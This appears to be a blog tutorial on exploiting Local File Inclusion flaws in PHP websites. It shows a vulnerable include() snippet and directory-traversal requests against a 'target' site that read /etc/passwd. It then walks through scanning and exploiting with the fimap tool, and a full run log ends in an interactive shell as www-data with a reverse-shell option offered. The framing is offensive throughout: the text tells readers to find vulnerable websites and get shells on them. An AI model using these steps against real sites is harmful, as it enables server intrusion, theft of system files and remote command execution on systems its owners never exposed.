Local File Inclusion Example 2
LOCAL FILE INCLUSION:
Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected
show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial.
First lets take a look at a php code that is vulnerable to LFI:
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the $page isn’t sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to find in the ‘www’
step 2:
Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
eg.. www.website.com/view.php?page=contact.php
- Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
big chances to have a Local File Inclusion vulnerability.Let's go to next step.
- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
http://www.website.com/view.php?page.../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
http://www.website.com/view.php?page.../../etc/passwd
we succesfully included the etc/passwd file.
step 3:
lets try something different
download FIMAP from http://code.google.com/p/fimap/
now make sure that u have python installed....Python version 2.6.4
now lets start lfi..........
step 4:
scan using fimap in command promp make sure that you are in fimap directory
now for URL scanning we need to use -u.......
/***************desktop\fi>fimap.py -u "target URL"********************/
If fimap has found an Inclusion-Bug, you will see a box like this:
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
You can see that we actually have readable files. Some of them are usable to inject code - some not.
fimap will automaticly log every valuable result to '~/fimap_results.xml'. The XML will never be deleted.
All new results will be injected correctly into the XML.
now we have to exploit using -x
/***************deskop\fi>fimap.py -x "target URL"*********************/
FULL EXAMPLE RUN
[CMD]imax@DevelB0x:~$ ./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: 'http://localhost/vulnerable.php?inc=index.php'
[OUT] Parsing URL 'http://localhost/vulnerable.php?inc=index.php'...
[INFO] Fiddling around with URL...
[OUT] Possible file inclusion found! -> 'http://localhost/vulnerable.php?inc=bUTeWg6j' with Parameter 'inc'.
[OUT] Identifing Vulnerability 'http://localhost/vulnerable.php?inc=index.php' with Key 'inc'...
[INFO] Scriptpath received: '/var/www'
[INFO] Testing file '/etc/passwd'...
[INFO] Testing file '/proc/self/environ'...
[INFO] Testing file 'php://input'...
[INFO] Testing file 'http://www.phpbb.de/index.php'...
[INFO] Testing file 'http://www.uni-bonn.de/Frauengeschichte/index.html'...
[INFO] Testing file 'http://www.kah-bonn.de/index.htm?presse/winterthur.htm'...
###################################################################################
#[1] Possible File Injection #
###################################################################################
# [URL] http://localhost/vulnerable.php?inc=index.php #
# [PARAM] inc #
# [PATH] /var/www #
# [TYPE] Absolute Clean + Remote injection #
# [NULLBYTE] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
# [1] php://input #
# [2] http://www.phpbb.de/index.php #
# [3] http://www.uni-bonn.de/Frauengeschichte/index.html #
# [4] http://www.kah-bonn.de/index.htm?presse/winterthur.htm #
###################################################################################
[CMD]imax@DevelB0x:~$ ./fimap.py -x
fimap v.01 by Iman Karim - Automatic LFI/RFI scanner and exploiter.
###################
#List of Domains #
###################
#[1] localhost #
###################
Choose Domain: 1
###############################################################################################
#FI Bugs on localhost #
###############################################################################################
#[1] URL: '/vulnerable.php?inc=index.php' injecting file: 'php://input' using param: 'inc' #
###############################################################################################
Choose vulnerable script: 1
[INFO] Testing code injection thru POST...
[OUT] PHP Injection works! Testing if execution works...
[OUT] Testing execution thru 'popen'...
#################################
#Available Attacks #
#################################
#[1] Spawn Shell #
#[2] Create reverse shell... #
#################################
Choose Attack: 1
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Enter 'q' to exit the shell.
-------------------------------------------
fimap_shell$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
fimap_shell$> uname -a
Linux DevelB0x 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
fimap_shell$> q
now just type the exact url i.e...., the path of the shell.................
Comments
Post a Comment